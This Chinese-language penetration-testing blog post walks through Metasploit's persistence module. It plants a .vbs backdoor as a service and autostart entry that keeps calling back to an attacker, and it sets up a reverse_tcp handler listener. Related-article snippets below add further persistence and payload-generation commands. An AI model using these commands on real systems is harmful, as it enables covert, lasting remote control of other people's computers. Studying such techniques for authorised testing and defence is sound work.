渗透之——Metasploit访问控制的持久化

最新推荐文章于 2024-05-01 06:14:19 发布
最新推荐文章于 2024-05-01 06:14:19 发布
阅读量3.3k 收藏 11
点赞数 1
分类专栏: 精通渗透系列 文章标签: 渗透 持久化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l1028386804/article/details/86358463
版权

转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86358463

工具:Metasploit

为了实现这一点,可以选择在目标计算机上添加一个新的用户,也可以选择使用MSF中persistence模块。

运行persistence模块可以通过在目标计算机上安装一个永久性的后门来实现访问控制的持久化。这样,即使有一天目标计算机修补了漏洞,我们仍然可以通过这个连接来实现对目标计算机的控制。

这里,我们假设经过了一系列的渗透拿到了system权限的meterpreter,我们在meterpreter命令行执行如下命令:

run persistence

运行persistence模块会向目标计算机上传一个.vbs类型的恶意脚本文件,并在目标计算机上执行这个恶意脚本文件。这个脚本一旦在目标计算机上运行,每隔几秒钟就会主动连接攻击者的计算机。这个恶意脚本文件会被当做一个系统服务安装在目标计算机系统中,同时,会被添加到开机启动项中,因此,无论目标计算机重启多少次,该恶意服务都可以运行。除非卸载该服务或手动删除文件,否则恶意服务一直存在。

这里,我们重新开启一个MSF来验证:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.109.137
set LPORT 4444
exploit

此处需要注意的是:我们设置攻击载荷和LPORT选项必须与运行persistence模块时设置的攻击载荷和LPORT选项相同。

发出攻击命令exploit后,exploit/multi/handler开始等待从目标系统上发回来的连接。一旦传入的连接被检测到,控制端就会切换到Meterpreter命令行。

 

冰 河
关注
专栏目录
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
持久ing+
algae
04-27 391
持久化msf生成的shell中,无论是是android还是windows在关闭软件或者设备重启后,我们的会话进程都会自然而然的关闭。要想得到会话,必须用户再次启动我们的shell才能得到会话。那么,我们该如何解决这一问题呢?持久化msf/Windows持久化1、metsvc:通过服务启动,是 Meterpreter 下的一个脚本;运行 run mets...
shellcode持久化--后渗透
renyizou的博客
06-16 303
migrate 隐藏(依附)进程 键盘监控 杀进程 用户哈希 持久化进程 通过写入注册表 每50秒重连主机的ip一次,走4343端口 重启之后自动链接上了 查看winxp启动项:开始---运行--输入msconfig -6 看看靶机,顺着启动项看了一下就是右上角这个.vbs文件 ...
使用metasploit 框架保持持久性
weixin_30389003的博客
12-04 190
1.metsvc脚本  2.persistence 脚本         run persistence -X -i 10 -p 444 -r 目标ip     删除脚本         run multi_console_command -rc 3.使用Netcat 作为持久代理       在meterpreter 中输入:             uplo...
永远的后门
hunix
01-22 261
[size=medium][size=small][/size] IIS是比较流行的www服务器,设置不当漏洞就很多。入侵iis服务器后留下后门,以后就可以随时控制。一般的后门程序都是打开一个特殊的端口来监听,比如有nc,ntlm,rnc等等都是以一种类telnet的方式在服务器端监听远程的连接控制。不过一个比较防范严密的www站点(他们的管理员吃了苦头后)一般通过防火墙对端口进行限制,这样除了管...
Windows内网渗透篇-后门持久化姿势总结
黄乔国PHP
01-23 1037
拿下服务器之后,应该怎么做到持久化控制呢?下面总结了内网渗透中常见的持久化姿势,如:映像劫持,定时任务,登录脚本等常见持久化操作,希望对大家工作或者学习有一定的帮助.
网络安全工程师与白帽子黑客教你Kali Linux:如何通过进程绑定实现持久化渗透控制实战?
Kali与编程
10-06 353
课前声明: 1、本分享仅做学习交流,请自觉遵守法律法规! 2、搜索:Kali 与编程,学习更多网络攻防干货! 3、Kali 与编程每天准时更新,敬请学习和关注! 正文部分 一、背景介绍 一般来说,我们在生成payload后利用生成的payload成功地拿下目标主机后,在Metasploi命令行界面成功连接到目标主机session(会话)后,常常会因为进程连接不稳定而导致进程频频断开或者连接不稳定的现象出现,非常不利于我们正常的进行渗透测试,那么针对这种现象有没有什么好的办法去解决他呢?接下来让我们一起来了解
Linux无线网络渗透技术详解——无线网络持久化访问技术
无线网络渗透技术简介 在本章中,我们将介绍无线网络渗透技术的基本概念和意义,以及探讨Linux在无线网络安全中的重要作用。让我们一起深入了解这一引人注目的领域。 # 2. 无线网络渗透技术基础 在无线网络渗透...
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 4495
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
安全笔记:渗透|MetasploitMSF终端——基础使用(未完全修改)
吾本一无所有,何患徒壁之忧.
05-19 1257
目录 基础 使用指南 接口 功能程序 基础功能 载荷配置 攻击方式 msfvenom 附属功能 数据库 nexpose nessus 自建脚本 常用模块介绍 情报搜集——扫描模块 渗透攻击 后渗透攻击(Meterpreter) 免杀技术 相关知识 基础 使用指南 情报搜集:通常使用信息探测等方式获取目标主机的信息,信息探测分为主动信息探测和被动信息探测,...
手把手教你用Python轻松玩转SQL注入——渗透利器
pyjishu的博客
03-25 2211
前言 大家好,我是黄伟。相信大家经常有听到过SQL注入啥的,但是并不是特别了解;小编以前就是经常听别人说,但是自己啥都不懂,直到后来看了相关教材后才明白,原来是这么个东西,那么到底是什么东西了,又或者是不是个东西了?我们接着往下看。 一、浅谈SQL注入 SQL注入其实就是把SQL命令插入到WEB表单中提交或者输入一些页面请求的查询字符串,比如我们输网址,就是相当于这种操作,只不过我们不是在测试SQL注入漏洞,而仅仅只是为了输入后看到相应网页上的内容而已。一般方法有,如:猜数据表名,其次就是绕过后.
LVS 的持久连接访问 【摘】
后端开发
05-27 314
原文连接:http://tech.ddvip.com/2012-11/1351746381184578.html其他相关连接:http://www.austintek.com/LVS/LVS-HOWTO/HOWTO/LVS-HOWTO.persistent_connection.html对于LVS的持久连接来说常见的分为三种PCC,PPC和基于防火墙标记的持久连接1)PCC用来实现把某个用户的所有
metasploit控制持久化
天元喜羊羊的博客
04-27 4672
msf exploit(ms08_067_netapi) > exploit [*] Started reverse handler on 192.168.1.11:4444 [*] Attempting to trigger the vulnerability... [*] Sending stage (752128 bytes) to 192.168.1.142 [*] Meterpre
渗透测试实战之WMI持久化记录
anquanzushiye的博客
02-01 1593
0x00 背景WMI(Windows Management Instrumentation,Windows 管理规范)是一项核心的 Windows 管理技术;用户可以使用 WMI 管理本...
常见的几种Windows后门持久化方式
qq284489030的博客
05-09 2089
0×0 背景 持久化后门是指当入侵者通过某种手段拿到服务器的控制权之后,通过在服务器上放置一些后门(脚本、进程、连接之类),来方便他以后持久性的入侵,简单梳理一下日常遇见windows用的比较多的一些持久化方式方便以后排查问题使用。 0×1 注册表自启动 最常见的在指定键值添加一个新的键值类型为REG_SZ,数据项中添写需要运行程序的路径即可以启动,此类操作一些较为敏感容易被本地AV...
渗透测试随笔
qq_44749590的博客
05-31 440
Linux命令: exit查看防火墙:netsh advfirewall show allprofile state 开/关防火墙:netsh advfirewall set allprofile state on/off 查询用户:net user 添加用户:net user wxq 123456 /add 查看本地组:net localgroup 查看组用户:net localgroup administrators 持久化后门(msfconsole): run persistence -U -..
metasploit framework的一些使用姿势(持续更新)
闵行小鱼塘
05-15 1903
记录一些metasploit的使用姿势
2024年最全Windows权限维持技术总结、复现_cs权限维持(2)
最新发布
2401_84281601的博客
05-01 462
在 Windows 上有一个重要的机制,也就是服务。服务程序通常默默的运行在后台,且拥有 SYSTEM 权限,非常适合用于后门持久化。我们可以将 EXE 文件注册为服务来作为后门。Windows 实现计划任务主要有 at 与 schtasks 两种方式,通过计划任务可以定时启动后门程序at 适用于windows 2000、2003、xp,schtasks适用于windows >= 2003利用 windows 开机启动项实现权限的维持,每次系统启动都可实现后门的执行,很不错的权限维持的方式。
MSF之persistence权限维持
大方子
10-18 2470
首先,我们先生成一个 PAYLOAD :  msfpayload(msfvenom) windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1218 X >xx.exe 接着,我们来配置一个反弹会话的监听处理: use exploit/multi/handler set payload windows/meterp...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

冰 河

可以吃鸡腿么?

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值